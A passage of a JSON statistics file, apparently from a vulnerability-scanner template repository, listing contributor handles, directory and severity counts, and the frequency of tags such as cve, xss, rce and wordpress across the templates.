lab","count":1},{"name":"archer","count":1},{"name":"technicaljunkie","count":1},{"name":"win3zz","count":1},{"name":"ooooooo_q","count":1},{"name":"shifacyclewla","count":1},{"name":"nerrorsec","count":1},{"name":"igibanez","count":1},{"name":"nuts7","count":1},{"name":"droberson","count":1},{"name":"vulnspace","count":1},{"name":"savik","count":1},{"name":"juliosmelo","count":1},{"name":"michael wedl","count":1},{"name":"mrcl0wnlab","count":1},{"name":"tehtbl","count":1},{"name":"joaonevess","count":1},{"name":"apt-mirror","count":1},{"name":"miroslavsotak","count":1},{"name":"h4kux","count":1},{"name":"couskito","count":1},{"name":"ynnirc","count":1},{"name":"jeya.seelan","count":1},{"name":"pwnwithlove","count":1},{"name":"amir-h-fallahi","count":1},{"name":"b4uh0lz","count":1},{"name":"pdp","count":1},{"name":"ling","count":1},{"name":"ndmalc","count":1},{"name":"httpvoid","count":1},{"name":"sinsinology","count":1},{"name":"babybash","count":1},{"name":"harshinsecurity","count":1},{"name":"unblvr1","count":1},{"name":"mubassirpatel","count":1},{"name":"elmahdi","count":1},{"name":"ilovebinbash","count":1},{"name":"ofjaaah","count":1},{"name":"hotpot","count":1},{"name":"amanrawat","count":1},{"name":"tim_koopmans","count":1},{"name":"noobexploiter","count":1},{"name":"dk999","count":1},{"name":"qianbenhyu","count":1},{"name":"open-sec","count":1},{"name":"adrianmf","count":1},{"name":"none","count":1},{"name":"fmunozs","count":1},{"name":"jaimin gondaliya","count":1},{"name":"bartu utku sarp","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"banana69","count":1},{"name":"_harleo","count":1},{"name":"xeldax","count":1},{"name":"cbadke","count":1},{"name":"dorkerdevil","count":1},{"name":"fq_hsu","count":1},{"name":"jbaines-r7","count":1},{"name":"pussycat0","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"thebinitghimire","count":1},{"name":"jfbes","count":1},{"name":"rinolock","count":1},{"name":"absshax","count":1},{"name":"liquidsec","count":1},{"name":"ayadi","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"2rs3c","count":1},{"name":"kurohost","count":1},{"name":"rotemreiss","count":1},{"name":"pudsec","count":1},{"name":"orpheus","count":1},{"name":"th3.d1p4k","count":1},{"name":"caon","count":1},{"name":"toufik-airane","count":1},{"name":"mayank_pandey01","count":1},{"name":"pry0cc","count":1},{"name":"jbertman","count":1},{"name":"m0ck3d","count":1},{"name":"petruknisme","count":1},{"name":"mah3sec_","count":1},{"name":"exploitation","count":1},{"name":"calumjelrick","count":1},{"name":"jeya seelan","count":1},{"name":"pratik khalane","count":1},{"name":"fpatrik","count":1},{"name":"amnotacat","count":1},{"name":"izn0u","count":1},{"name":"rivalsec","count":1},{"name":"josecosta","count":1},{"name":"bugvsme","count":1},{"name":"blckraven","count":1},{"name":"fopina","count":1},{"name":"tea","count":1},{"name":"hyunsoo-ds","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"dale clarke","count":1},{"name":"sshell","count":1},{"name":"kailashbohara","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"jteles","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"noamrathaus","count":1},{"name":"dawid-czarnecki","count":1},{"name":"lixts","count":1},{"name":"revblock","count":1},{"name":"eremit4","count":1},{"name":"0xparth","count":1},{"name":"danfaizer","count":1},{"name":"piyushchhiroliya","count":1},{"name":"danigoland","count":1},{"name":"tirtha","count":1},{"name":"luqman","count":1},{"name":"udyz","count":1},{"name":"narluin","count":1},{"name":"xstp","count":1},{"name":"smaranchand","count":1},{"name":"zn9988","count":1},{"name":"breno_css","count":1},{"name":"0h1in9e","count":1},{"name":"yusakie","count":1},{"name":"wlayzz","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"amirmsafari","count":1},{"name":"alperenkesk","count":1},{"name":"kr1shna4garwal","count":1},{"name":"dmartyn","count":1},{"name":"yavolo","count":1},{"name":"vinit989","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"elitebaz","count":1},{"name":"flag007","count":1},{"name":"domenicoveneziano","count":1},{"name":"mass0ma","count":1},{"name":"drfabiocastro","count":1},{"name":"ledoubletake","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"remonsec","count":1},{"name":"0xceba","count":1},{"name":"youngpope","count":1},{"name":"unknown","count":1},{"name":"udinchan","count":1},{"name":"invisiblethreat","count":1},{"name":"marcio mendes","count":1},{"name":"guax1","count":1},{"name":"vikas kundu","count":1},{"name":"ap3r","count":1},{"name":"justmumu","count":1},{"name":"mbmy","count":1},{"name":"yashanand155","count":1},{"name":"pulsesecurity.co.nz","count":1},{"name":"undefl0w","count":1},{"name":"push4d","count":1},{"name":"akshansh","count":1},{"name":"skylark-lab","count":1},{"name":"jrolf","count":1},{"name":"yuansec","count":1},{"name":"vzamanillo","count":1},{"name":"dabla","count":1},{"name":"willd96","count":1},{"name":"francescocarlucci","count":1},{"name":"0xcharan","count":1},{"name":"whynotke","count":1},{"name":"alexrydzak","count":1},{"name":"xshuden","count":1},{"name":"olewagner","count":1},{"name":"hanlaomo","count":1},{"name":"c4sper0","count":1},{"name":"aaronchen0","count":1},{"name":"arqsz","count":1},{"name":"andirrahmani1","count":1},{"name":"miguelsegoviagil","count":1},{"name":"zsusac","count":1},{"name":"shivampand3y","count":1},{"name":"unkl4b","count":1},{"name":"kabirsuda","count":1},{"name":"dievus","count":1},{"name":"screamy","count":1},{"name":"sherlocksecurity","count":1},{"name":"hardik-rathod","count":1},{"name":"omarjezi","count":1},{"name":"duty_1g","count":1},{"name":"esonhugh","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"k3rwin","count":1},{"name":"ipanda","count":1},{"name":"christbowel","count":1},{"name":"rumble773","count":1},{"name":"lady_bug","count":1},{"name":"tirtha_mandal","count":1},{"name":"yashgoti","count":1},{"name":"alex","count":1},{"name":"phillipo","count":1},{"name":"shiva (strobes security)","count":1},{"name":"jcockhren","count":1},{"name":"stupidfish","count":1},{"name":"mchklt","count":1},{"name":"aringo-bf","count":1},{"name":"erikowen","count":1},{"name":"evolutionsec","count":1},{"name":"jc175","count":1},{"name":"houdinis","count":1},{"name":"viondexd","count":1},{"name":"kchason","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"pbuff07","count":1},{"name":"freakyclown","count":1},{"name":"hakluke","count":1},{"name":"hlop","count":1},{"name":"hexcat","count":1},{"name":"dwbzn","count":1},{"name":"brianlam38","count":1},{"name":"tangxiaofeng7","count":1},{"name":"ramkrishna sawant","count":1},{"name":"x6263","count":1},{"name":"0xtavian","count":1},{"name":"sicksec","count":1},{"name":"djoevanka","count":1},{"name":"0xceeb","count":1},{"name":"becivells","count":1},{"name":"co0nan","count":1},{"name":"wabafet","count":1},{"name":"sanineng","count":1},{"name":"paper-pen","count":1},{"name":"w8ay","count":1},{"name":"daffianfo","count":1},{"name":"barthy.koeln","count":1},{"name":"cravaterouge","count":1},{"name":"akash.c","count":1},{"name":"rubina119","count":1},{"name":"naglis","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"elder tao","count":1},{"name":"kagamigawa","count":1},{"name":"ky9oss","count":1},{"name":"galoget","count":1},{"name":"mlec","count":1},{"name":"af001","count":1},{"name":"jas37","count":1},{"name":"thirukrishnan","count":1},{"name":"carrot2","count":1},{"name":"adilsoybali","count":1},{"name":"bywalks","count":1},{"name":"nobody","count":1},{"name":"jaskaran","count":1},{"name":"compr00t","count":1},{"name":"rojanrijal","count":1},{"name":"b0yd","count":1},{"name":"daviey","count":1},{"name":"prettyboyaaditya","count":1},{"name":"hateshape","count":1},{"name":"schniggie","count":1},{"name":"watchtowr","count":1},{"name":"jonathanwalker","count":1},{"name":"patrick pirker","count":1},{"name":"zinminphy0","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"xcapri","count":1},{"name":"patralos","count":1},{"name":"8authur","count":1},{"name":"makyotox","count":1},{"name":"gboddin","count":1},{"name":"charles d.","count":1},{"name":"colbyjack1134","count":1},{"name":"pascalheidmann","count":1},{"name":"palanichamy_perumal","count":1},{"name":"mayankpandey01","count":1},{"name":"0xrod","count":1},{"name":"qlkwej","count":1},{"name":"sttlr","count":1},{"name":"0xh7ml","count":1},{"name":"_darrenmartyn","count":1},{"name":"harryha","count":1},{"name":"davidfegyver","count":1},{"name":"mariam tariq","count":1},{"name":"shreyapohekar","count":1},{"name":"ldionmarcil","count":1},{"name":"shiar","count":1},{"name":"realexp3rt","count":1},{"name":"whotwagner","count":1},{"name":"f1she3","count":1},{"name":"kaizensecurity","count":1},{"name":"sak1","count":1},{"name":"byobin","count":1},{"name":"zandros0","count":1},{"name":"jiheon-dev","count":1},{"name":"j33n1k4","count":1},{"name":"secthebit","count":1},{"name":"manasmbellani","count":1},{"name":"godfatherorwa","count":1},{"name":"hakimkt","count":1},{"name":"arr0way","count":1},{"name":"lethargynavigator","count":1},{"name":"aaban solutions","count":1},{"name":"adamparsons","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"imhunterand","count":1},{"name":"yaser_s","count":1},{"name":"r3s ost","count":1},{"name":"mabdullah22","count":1},{"name":"ruppde","count":1},{"name":"un-fmunozs","count":1},{"name":"exceed","count":1},{"name":"charanrayudu","count":1},{"name":"ptonewreckin","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"luqmaan hadia","count":1},{"name":"higor melgaço","count":1},{"name":"aresx","count":1},{"name":"berkdusunur","count":1},{"name":"deena","count":1},{"name":"west-wise","count":1},{"name":"am0nt31r0","count":1},{"name":"pjborah","count":1},{"name":"failopen","count":1},{"name":"sec_hawk","count":1},{"name":"_c0wb0y_","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"s1r1u5_","count":1},{"name":"sorrowx3","count":1},{"name":"borna nematzadeh","count":1},{"name":"ph33rr","count":1},{"name":"queencitycyber","count":1},{"name":"momen eldawakhly","count":1},{"name":"lbb","count":1},{"name":"ohlinge","count":1},{"name":"rotembar","count":1},{"name":"dali","count":1},{"name":"0ut0fb4nd","count":1},{"name":"osamahamad","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"mesaglio","count":1},{"name":"iampritam","count":1},{"name":"ramondunker","count":1},{"name":"clment cruchet","count":1},{"name":"andysvints","count":1},{"name":"kiks7","count":1},{"name":"anon-artist","count":1},{"name":"metascan","count":1},{"name":"mhdsamx","count":1},{"name":"b0rn2r00t","count":1},{"name":"rschio","count":1},{"name":"ahmed abou-ela","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"r3nz0","count":1},{"name":"ok_bye_now","count":1},{"name":"noah @thesubtlety","count":1},{"name":"bjhulst","count":1},{"name":"alevsk","count":1},{"name":"zeyad azima","count":1},{"name":"official_blackhat13","count":1},{"name":"xc1ym","count":1},{"name":"1nf1n7y","count":1},{"name":"regala_","count":1},{"name":"floriandewald","count":1},{"name":"mantissts","count":1},{"name":"professorabhay","count":1},{"name":"juicypotato1","count":1},{"name":"axrk","count":1},{"name":"jna1","count":1},{"name":"mr.bobo hp","count":1},{"name":"intx0x80","count":1},{"name":"ahmed sherif","count":1},{"name":"chetgan","count":1},{"name":"5up3r541y4n","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"notsoevilweasel","count":1},{"name":"arall","count":1},{"name":"pepitoh","count":1},{"name":"t3l3machus","count":1},{"name":"erethon","count":1},{"name":"knassar702","count":1},{"name":"omarkurt","count":1},{"name":"d0rkerdevil","count":1},{"name":"kareemse1im","count":1},{"name":"unp4ck","count":1},{"name":"carlosvieira","count":1},{"name":"booboohq","count":1},{"name":"0xd0ff9","count":1},{"name":"wpsec","count":1},{"name":"jacalynli","count":1},{"name":"phyr3wall","count":1},{"name":"husain","count":1},{"name":"rodnt","count":1},{"name":"nielsing","count":1},{"name":"manuelbua","count":1},{"name":"miryangjung","count":1},{"name":"pphuahua","count":1},{"name":"sdcampbell","count":1},{"name":"akokonunes","count":1},{"name":"elouhi","count":1},{"name":"y0no","count":1},{"name":"majidmc2","count":1},{"name":"infosecsanyam","count":1},{"name":"irshadahamed","count":1},{"name":"lamscun","count":1},{"name":"s1r1us","count":1},{"name":"w0tx","count":1},{"name":"myst7ic","count":1},{"name":"kresec","count":1},{"name":"luciannitescu","count":1},{"name":"0xteles","count":1},{"name":"arjunchandarana","count":1},{"name":"petergrifin","count":1},{"name":"ola456","count":1},{"name":"nagli","count":1},{"name":"mihhailsokolov","count":1},{"name":"aron molnar","count":1},{"name":"0xprial","count":1},{"name":"bjxsec","count":1},{"name":"thelicato","count":1},{"name":"luskabol","count":1},{"name":"mukundbhuva","count":1},{"name":"allenwest24","count":1}],"directory":[{"name":"http","count":7229},{"name":"file","count":312},{"name":"workflows","count":191},{"name":"network","count":132},{"name":"code","count":80},{"name":"ssl","count":27},{"name":"javascript","count":26},{"name":"dns","count":18},{"name":"headless","count":11},{"name":"cloud","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3544},{"name":"high","count":1583},{"name":"medium","count":1464},{"name":"critical","count":960},{"name":"low","count":258},{"name":"unknown","count":35}],"types":[{"name":"file","count":312},{"name":"dns","count":21}]} +{"tags":[{"name":"cve","count":2396},{"name":"panel","count":1105},{"name":"wordpress","count":958},{"name":"exposure","count":894},{"name":"xss","count":893},{"name":"wp-plugin","count":833},{"name":"osint","count":799},{"name":"tech","count":667},{"name":"lfi","count":640},{"name":"edb","count":598},{"name":"misconfig","count":595},{"name":"rce","count":573},{"name":"packetstorm","count":523},{"name":"cve2021","count":488},{"name":"wpscan","count":486},{"name":"cve2022","count":469},{"name":"wp","count":408},{"name":"unauth","count":357},{"name":"file","count":346},{"name":"cve2023","count":342},{"name":"authenticated","count":333},{"name":"sqli","count":329},{"name":"intrusive","count":291},{"name":"kev","count":270},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"login","count":234},{"name":"detect","count":226},{"name":"config","count":217},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"oast","count":209},{"name":"default-login","count":201},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":178},{"name":"network","count":174},{"name":"iot","count":166},{"name":"cve2019","count":163},{"name":"cve2018","count":161},{"name":"keys","count":155},{"name":"joomla","count":146},{"name":"malware","count":141},{"name":"redirect","count":132},{"name":"auth-bypass","count":123},{"name":"phishing","count":117},{"name":"ssrf","count":114},{"name":"cve2010","count":112},{"name":"files","count":112},{"name":"cve2017","count":110},{"name":"cms","count":107},{"name":"router","count":107},{"name":"install","count":105},{"name":"top-100","count":100},{"name":"devops","count":87},{"name":"disclosure","count":87},{"name":"linux","count":82},{"name":"code","count":80},{"name":"privesc","count":79},{"name":"local","count":79},{"name":"tokens","count":78},{"name":"seclists","count":77},{"name":"takeover","count":74},{"name":"fileupload","count":71},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":65},{"name":"adobe","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":58},{"name":"atlassian","count":56},{"name":"cve2016","count":56},{"name":"google","count":56},{"name":"ir","count":56},{"name":"vmware","count":54},{"name":"enum","count":51},{"name":"c2","count":50},{"name":"logs","count":49},{"name":"js","count":48},{"name":"tenable","count":47},{"name":"log4j","count":46},{"name":"aem","count":45},{"name":"debug","count":45},{"name":"osint-gaming","count":45},{"name":"hackerone","count":45},{"name":"jndi","count":44},{"name":"cve2014","count":44},{"name":"aws","count":44},{"name":"vulhub","count":44},{"name":"cloud","count":43},{"name":"deserialization","count":42},{"name":"osint-hobby","count":42},{"name":"traversal","count":42},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"generic","count":42},{"name":"oa","count":41},{"name":"php","count":41},{"name":"springboot","count":41},{"name":"cnvd","count":39},{"name":"misc","count":38},{"name":"microsoft","count":37},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"kubernetes","count":37},{"name":"injection","count":36},{"name":"ibm","count":35},{"name":"osint-misc","count":35},{"name":"sap","count":32},{"name":"cti","count":32},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"fuzz","count":31},{"name":"cve2024","count":30},{"name":"osint-coding","count":30},{"name":"k8s","count":28},{"name":"gitlab","count":28},{"name":"ssl","count":28},{"name":"wp-theme","count":28},{"name":"tls","count":28},{"name":"amazon","count":27},{"name":"dlink","count":27},{"name":"api","count":27},{"name":"bestwebsoft","count":27},{"name":"fortinet","count":26},{"name":"ssh","count":26},{"name":"proxy","count":25},{"name":"weaver","count":25},{"name":"manageengine","count":25},{"name":"firewall","count":25},{"name":"cve2012","count":25},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"zoho","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"osint-images","count":24},{"name":"audit","count":23},{"name":"file-upload","count":23},{"name":"lfr","count":23},{"name":"dns","count":23},{"name":"stored-xss","count":23},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"cicd","count":22},{"name":"xxe","count":22},{"name":"citrix","count":21},{"name":"weblogic","count":21},{"name":"github","count":21},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"printer","count":21},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"rukovoditel","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"hp","count":19},{"name":"ftp","count":19},{"name":"struts","count":19},{"name":"osint-music","count":18},{"name":"android","count":18},{"name":"prestashop","count":18},{"name":"cve2011","count":18},{"name":"coldfusion","count":18},{"name":"ruijie","count":18},{"name":"node.js","count":17},{"name":"azure","count":17},{"name":"confluence","count":17},{"name":"nginx","count":17},{"name":"service","count":17},{"name":"backup","count":16},{"name":"osint-blog","count":16},{"name":"mail","count":16},{"name":"honeypot","count":16},{"name":"alibaba","count":16},{"name":"rconfig","count":16},{"name":"status","count":16},{"name":"jarm","count":16},{"name":"microweber","count":16},{"name":"cve2009","count":16},{"name":"vpn","count":15},{"name":"cve2008","count":15},{"name":"magento","count":15},{"name":"bypass","count":15},{"name":"zyxel","count":15},{"name":"java","count":15},{"name":"cnvd2021","count":15},{"name":"tongda","count":15},{"name":"cve2013","count":15},{"name":"woocommerce","count":15},{"name":"seeyon","count":15},{"name":"nodejs","count":15},{"name":"smb","count":14},{"name":"redis","count":14},{"name":"zohocorp","count":14},{"name":"smtp","count":14},{"name":"dashboard","count":14},{"name":"osint-art","count":14},{"name":"osint-health","count":14},{"name":"creds-stuffing","count":14},{"name":"npm","count":14},{"name":"node","count":14},{"name":"login-check","count":14},{"name":"dell","count":14},{"name":"ruby","count":14},{"name":"domainmod","count":14},{"name":"icewarp","count":14},{"name":"jboss","count":14},{"name":"auth","count":14},{"name":"docker","count":14},{"name":"backdoor","count":14},{"name":"cuppa","count":13},{"name":"graphql","count":13},{"name":"sonicwall","count":13},{"name":"osint-dating","count":13},{"name":"git","count":13},{"name":"rails","count":13},{"name":"fortigate","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"windows","count":13},{"name":"laravel","count":13},{"name":"airflow","count":13},{"name":"setup","count":13},{"name":"netgear","count":13},{"name":"ivanti","count":12},{"name":"ofbiz","count":12},{"name":"doppler","count":12},{"name":"drupal","count":12},{"name":"kafka","count":12},{"name":"newrelic","count":12},{"name":"netsweeper","count":12},{"name":"mysql","count":12},{"name":"ssti","count":12},{"name":"moosocial","count":12},{"name":"zimbra","count":12},{"name":"webserver","count":12},{"name":"headless","count":12},{"name":"fastjson","count":11},{"name":"iis","count":11},{"name":"jetbrains","count":11},{"name":"phpgurukul","count":11},{"name":"osint-video","count":11},{"name":"spring","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"jolokia","count":11},{"name":"phpmyadmin","count":11},{"name":"online-fire-reporting","count":11},{"name":"vbulletin","count":11},{"name":"xstream","count":11},{"name":"symfony","count":10},{"name":"cache","count":10},{"name":"glpi","count":10},{"name":"django","count":10},{"name":"nagios","count":10},{"name":"elasticsearch","count":10},{"name":"info-leak","count":10},{"name":"hikvision","count":10},{"name":"solarview","count":10},{"name":"xstream_project","count":10},{"name":"sitecore","count":10},{"name":"dropbox","count":10},{"name":"db","count":10},{"name":"digitalocean","count":10},{"name":"prometheus","count":10},{"name":"zabbix","count":10},{"name":"thinkphp","count":10},{"name":"installer","count":10},{"name":"dedecms","count":10},{"name":"solr","count":10},{"name":"sangfor","count":9},{"name":"facebook","count":9},{"name":"hashicorp","count":9},{"name":"opencats","count":9},{"name":"artica","count":9},{"name":"exchange","count":9},{"name":"secret","count":9},{"name":"firebase","count":9},{"name":"lucee","count":9},{"name":"wso2","count":9},{"name":"python","count":9},{"name":"instrusive","count":9},{"name":"scada","count":9},{"name":"versa","count":9},{"name":"druid","count":9},{"name":"pfsense","count":9},{"name":"bitbucket","count":9},{"name":"moodle","count":9},{"name":"vcenter","count":9},{"name":"kube","count":9},{"name":"gitea","count":9},{"name":"cnvd2020","count":9},{"name":"symantec","count":8},{"name":"config-audit","count":8},{"name":"atom","count":8},{"name":"console","count":8},{"name":"ognl","count":8},{"name":"oauth","count":8},{"name":"bucket","count":8},{"name":"metadata","count":8},{"name":"phpjabbers","count":8},{"name":"huawei","count":8},{"name":"elastic","count":8},{"name":"manager","count":8},{"name":"samsung","count":8},{"name":"discord","count":8},{"name":"go","count":8},{"name":"e-office","count":8},{"name":"osint-news","count":8},{"name":"dahua","count":8},{"name":"crlf","count":8},{"name":"recon","count":8},{"name":"cisco-switch","count":8},{"name":"default-page","count":8},{"name":"mlflow","count":8},{"name":"wanhu","count":8},{"name":"mirai","count":8},{"name":"spotweb","count":8},{"name":"hms","count":8},{"name":"sophos","count":8},{"name":"emerge","count":8},{"name":"phpinfo","count":8},{"name":"unauthenticated","count":8},{"name":"cloud-enum","count":8},{"name":"error","count":7},{"name":"joomla\\!","count":7},{"name":"odoo","count":7},{"name":"blockchain","count":7},{"name":"fpd","count":7},{"name":"maps","count":7},{"name":"ec2","count":7},{"name":"mobileiron","count":7},{"name":"keking","count":7},{"name":"blind","count":7},{"name":"nacos","count":7},{"name":"filemanager","count":7},{"name":"avtech","count":7},{"name":"nagiosxi","count":7},{"name":"monstra","count":7},{"name":"linkedin","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"exploitdb","count":7},{"name":"solarwinds","count":7},{"name":"progress","count":7},{"name":"bigip","count":7},{"name":"redhat","count":7},{"name":"gogs","count":7},{"name":"fortios","count":7},{"name":"shopify","count":7},{"name":"database","count":7},{"name":"opensis","count":7},{"name":"vms","count":7},{"name":"cacti","count":7},{"name":"nexus","count":7},{"name":"bloofox","count":7},{"name":"squirrelmail","count":7},{"name":"ruckus","count":7},{"name":"twitter","count":7},{"name":"pmb","count":7},{"name":"moodating","count":7},{"name":"activemq","count":7},{"name":"slack","count":7},{"name":"websphere","count":7},{"name":"spotweb_project","count":7},{"name":"cobbler","count":6},{"name":"teamcity","count":6},{"name":"typo3","count":6},{"name":"magmi","count":6},{"name":"minio","count":6},{"name":"rfi","count":6},{"name":"s3","count":6},{"name":"mongodb","count":6},{"name":"jeecg","count":6},{"name":"express","count":6},{"name":"log","count":6},{"name":"tikiwiki","count":6},{"name":"jetty","count":6},{"name":"microstrategy","count":6},{"name":"lfprojects","count":6},{"name":"advantech","count":6},{"name":"oos","count":6},{"name":"openvpn","count":6},{"name":"liferay","count":6},{"name":"landray","count":6},{"name":"gcp","count":6},{"name":"contec","count":6},{"name":"geoserver","count":6},{"name":"vrealize","count":6},{"name":"74cms","count":6},{"name":"microfocus","count":6},{"name":"sonarqube","count":6},{"name":"doctor-appointment-system","count":6},{"name":"webmin","count":6},{"name":"asp","count":6},{"name":"servicenow","count":6},{"name":"cockpit","count":6},{"name":"couchdb","count":6},{"name":"f5","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"chanjet","count":6},{"name":"zhiyuan","count":6},{"name":"elfinder","count":6},{"name":"jamf","count":6},{"name":"paypal","count":6},{"name":"flutterwave","count":6},{"name":"plesk","count":6},{"name":"keycloak","count":6},{"name":"leak","count":6},{"name":"sql","count":6},{"name":"nortekcontrol","count":6},{"name":"kubelet","count":6},{"name":"cloudflare","count":5},{"name":"square","count":5},{"name":"10web","count":5},{"name":"adb","count":5},{"name":"xmlrpc","count":5},{"name":"strapi","count":5},{"name":"jupyter","count":5},{"name":"swagger","count":5},{"name":"gocd","count":5},{"name":"avaya","count":5},{"name":"matrix","count":5},{"name":"splunk","count":5},{"name":"openai","count":5},{"name":"carrental","count":5},{"name":"totolink","count":5},{"name":"sentry","count":5},{"name":"storage","count":5},{"name":"redmine","count":5},{"name":"ems","count":5},{"name":"resin","count":5},{"name":"craftcms","count":5},{"name":"chamilo","count":5},{"name":"connectwise","count":5},{"name":"adminer","count":5},{"name":"ethereum","count":5},{"name":"webview","count":5},{"name":"openemr","count":5},{"name":"zzzcms","count":5},{"name":"cnvd2023","count":5},{"name":"jwt","count":5},{"name":"beyondtrust","count":5},{"name":"graylog","count":5},{"name":"hybris","count":5},{"name":"rseenet","count":5},{"name":"server","count":5},{"name":"decision-center","count":5},{"name":"papercut","count":5},{"name":"thedigitalcraft","count":5},{"name":"tenda","count":5},{"name":"voip","count":5},{"name":"goanywhere","count":5},{"name":"sftp","count":5},{"name":"caucho","count":5},{"name":"apisix","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"kkfileview","count":5},{"name":"elementor","count":5},{"name":"sysaid","count":5},{"name":"ldap","count":5},{"name":"cve2007","count":5},{"name":"avideo","count":5},{"name":"fatpipe","count":5},{"name":"dionaea","count":5},{"name":"terramaster","count":5},{"name":"wbce","count":5},{"name":"percha","count":5},{"name":"asana","count":5},{"name":"axigen","count":5},{"name":"circontrol","count":5},{"name":"agentejo","count":5},{"name":"circarlife","count":5},{"name":"openstack","count":5},{"name":"react","count":5},{"name":"genetechsolutions","count":5},{"name":"magmi_project","count":5},{"name":"awstats","count":5},{"name":"gateway","count":5},{"name":"akamai","count":5},{"name":"web3","count":5},{"name":"metinfo","count":5},{"name":"bmc","count":5},{"name":"jabber","count":5},{"name":"firmware","count":5},{"name":"parallels","count":5},{"name":"pyload","count":5},{"name":"webmail","count":4},{"name":"flickr","count":4},{"name":"d-link","count":4},{"name":"sendgrid","count":4},{"name":"codeigniter","count":4},{"name":"age-encryption","count":4},{"name":"wp-statistics","count":4},{"name":"finicity","count":4},{"name":"qdpm","count":4},{"name":"panabit","count":4},{"name":"metabase","count":4},{"name":"bittrex","count":4},{"name":"arcgis","count":4},{"name":"prtg","count":4},{"name":"sound4","count":4},{"name":"osint-archived","count":4},{"name":"rocketchat","count":4},{"name":"gnuboard","count":4},{"name":"puppet","count":4},{"name":"joomlamo","count":4},{"name":"cnvd2022","count":4},{"name":"flatpress","count":4},{"name":"concrete","count":4},{"name":"okta","count":4},{"name":"panos","count":4},{"name":"mikrotik","count":4},{"name":"aria","count":4},{"name":"photo","count":4},{"name":"openfire","count":4},{"name":"rabbitmq","count":4},{"name":"pmb_project","count":4},{"name":"kyocera","count":4},{"name":"pixie","count":4},{"name":"glpi-project","count":4},{"name":"auieo","count":4},{"name":"harmistechnology","count":4},{"name":"figma","count":4},{"name":"powerjob","count":4},{"name":"kibana","count":4},{"name":"consul","count":4},{"name":"jfrog","count":4},{"name":"mautic","count":4},{"name":"easypost","count":4},{"name":"casaos","count":4},{"name":"webkul","count":4},{"name":"hoteldruid","count":4},{"name":"metasploit","count":4},{"name":"password","count":4},{"name":"search","count":4},{"name":"nuuo","count":4},{"name":"httpserver","count":4},{"name":"wpdevart","count":4},{"name":"pip","count":4},{"name":"newstatpress_project","count":4},{"name":"mostra","count":4},{"name":"grav","count":4},{"name":"hongfan","count":4},{"name":"ampache","count":4},{"name":"jorani","count":4},{"name":"hpe","count":4},{"name":"info","count":4},{"name":"thinkcmf","count":4},{"name":"wireguard","count":4},{"name":"newstatpress","count":4},{"name":"httpd","count":4},{"name":"phpjabber","count":4},{"name":"hongdian","count":4},{"name":"froxlor","count":4},{"name":"opencms","count":4},{"name":"purchase_order_management_system_project","count":4},{"name":"moveit","count":4},{"name":"harbor","count":4},{"name":"linkerd","count":4},{"name":"spark","count":4},{"name":"salesforce","count":4},{"name":"shiro","count":4},{"name":"horde","count":4},{"name":"qnap","count":4},{"name":"confluent","count":4},{"name":"royalevent","count":4},{"name":"telegram","count":4},{"name":"centos","count":4},{"name":"mssql","count":4},{"name":"nextjs","count":4},{"name":"bitrix","count":4},{"name":"mcafee","count":4},{"name":"postmessage","count":4},{"name":"datadog","count":4},{"name":"mailchimp","count":4},{"name":"digitaldruid","count":4},{"name":"nosqli","count":4},{"name":"pie-register","count":4},{"name":"seagate","count":4},{"name":"yeswiki","count":4},{"name":"bamboo","count":4},{"name":"kentico","count":4},{"name":"telesquare","count":4},{"name":"mantisbt","count":4},{"name":"postgresql","count":4},{"name":"jsf","count":4},{"name":"ternaria","count":4},{"name":"roxy","count":4},{"name":"owncloud","count":4},{"name":"ray","count":4},{"name":"metersphere","count":4},{"name":"ebs","count":4},{"name":"aspose","count":4},{"name":"umbraco","count":4},{"name":"cve2005","count":4},{"name":"webshell","count":4},{"name":"flink","count":4},{"name":"linksys","count":4},{"name":"zte","count":4},{"name":"eclipse","count":4},{"name":"pluginus","count":4},{"name":"rat","count":4},{"name":"env","count":4},{"name":"zend","count":4},{"name":"stripe","count":4},{"name":"veronalabs","count":4},{"name":"kingsoft","count":4},{"name":"terra-master","count":4},{"name":"rubyonrails","count":4},{"name":"h3c","count":4},{"name":"dropbear","count":4},{"name":"aura","count":4},{"name":"jellyfin","count":4},{"name":"learnpress","count":4},{"name":"cnvd2019","count":4},{